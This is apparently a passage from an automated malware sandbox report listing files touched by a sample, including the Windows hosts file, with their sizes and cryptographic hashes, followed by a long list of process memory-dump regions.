                                                                                                                                                                                                9c779ba622e829246d42aad03d6d5eeb4763d87669009d4910b2a0bb75f1abe4

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                81d1d7b3d1b8faa18d1e735c2ddce71141bab23862bef1649dda90b6d67afc705306a13b352b578f1a30b22522a60524c3382b9a86503c981b6f58c88050388b

                                                                                                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                14bda2f1ac3ff6639c3c240fbfca881a

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                5850f40a49e51fccfd4c45fc251b6e76d1d91d44

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                13530fe3ccbf7c3e7e3f57932e2d86174041250362f350f87f9ebcc1a8a16eeb

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                f2ccbb9706ae08e591c2dbd21c5c5bd289ca3772be1dc7bf970bac6fc31dd5aa283d66425cd1ce04d01a80ac9f50e1315f0700878fd35387bc97dd791c9b7993

                                                                                                                                                                                              • C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1KB

                                                                                                                                                                                                MD5

                                                                                                                                                                                                008fba141529811128b8cd5f52300f6e

                                                                                                                                                                                                SHA1

                                                                                                                                                                                                1a350b35d82cb4bd7a924b6840c36a678105f793

                                                                                                                                                                                                SHA256

                                                                                                                                                                                                ab0e454a786ef19a3ae1337f10f47354ffa9521ea5026e9e11174eca22d86e84

                                                                                                                                                                                                SHA512

                                                                                                                                                                                                80189560b6cf180a9c1ecafc90018b48541687f52f5d49b54ca25e040b3264da053e3d4dbb0cd38caaf496e23e516de18f500b333e3cda1fd1b25c6e9632defc

                                                                                                                                                                                              • memory/1376-11-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1376-198-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1376-30-0x0000000003AD0000-0x0000000003AD1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-288-0x0000000005B20000-0x0000000005B21000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-280-0x0000000005A80000-0x0000000005A81000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-267-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1380-270-0x0000000003A80000-0x0000000003A81000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-277-0x00000000059B0000-0x00000000059B1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-278-0x00000000059D0000-0x00000000059D1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-279-0x00000000059F0000-0x00000000059F1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-282-0x0000000005AB0000-0x0000000005AB1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-281-0x0000000005A90000-0x0000000005A91000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-284-0x0000000005AD0000-0x0000000005AD1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-283-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-285-0x0000000005AF0000-0x0000000005AF1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-287-0x0000000005B10000-0x0000000005B11000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-286-0x0000000005B00000-0x0000000005B01000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-291-0x0000000005B50000-0x0000000005B51000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-292-0x0000000005B60000-0x0000000005B61000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-290-0x0000000005B40000-0x0000000005B41000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-289-0x0000000005B30000-0x0000000005B31000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-293-0x0000000005B70000-0x0000000005B71000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-294-0x0000000005B80000-0x0000000005B81000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-295-0x0000000005B90000-0x0000000005B91000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-296-0x0000000005BA0000-0x0000000005BA1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-297-0x0000000005BB0000-0x0000000005BB1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-298-0x0000000005BC0000-0x0000000005BC1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-299-0x0000000005BD0000-0x0000000005BD1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-300-0x0000000005BE0000-0x0000000005BE1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1380-348-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1500-1-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1500-0-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/1500-4-0x0000000003BB0000-0x0000000003BB1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-31-0x0000000005C00000-0x0000000005C01000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-83-0x00000000073D0000-0x00000000073D1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-82-0x0000000007A10000-0x0000000007A11000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-32-0x0000000005C10000-0x0000000005C11000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-186-0x00000000073E0000-0x00000000073E1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/1500-185-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/3808-12-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/3808-27-0x0000000002350000-0x0000000002351000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/3808-199-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/5020-381-0x0000000005A90000-0x0000000005A91000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-375-0x0000000005A20000-0x0000000005A21000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-384-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-386-0x0000000005AE0000-0x0000000005AE1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-383-0x0000000005AB0000-0x0000000005AB1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-382-0x0000000005AA0000-0x0000000005AA1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-357-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/5020-380-0x0000000005A80000-0x0000000005A81000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-378-0x0000000005A60000-0x0000000005A61000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-379-0x0000000005A70000-0x0000000005A71000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-373-0x00000000059E0000-0x00000000059E1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-377-0x0000000005A50000-0x0000000005A51000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-376-0x0000000005A30000-0x0000000005A31000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-385-0x0000000005AD0000-0x0000000005AD1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-374-0x0000000005A10000-0x0000000005A11000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-372-0x00000000059D0000-0x00000000059D1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-387-0x0000000005AF0000-0x0000000005AF1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-388-0x0000000005900000-0x0000000005901000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-389-0x0000000005A00000-0x0000000005A01000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-390-0x0000000005A40000-0x0000000005A41000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-371-0x00000000059C0000-0x00000000059C1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-368-0x00000000058E0000-0x00000000058E1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-402-0x0000000000140000-0x0000000001910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                23.8MB

                                                                                                                                                                                              • memory/5020-370-0x00000000059A0000-0x00000000059A1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-369-0x0000000005990000-0x0000000005991000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-367-0x00000000058C0000-0x00000000058C1000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/5020-362-0x0000000001F00000-0x0000000001F01000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB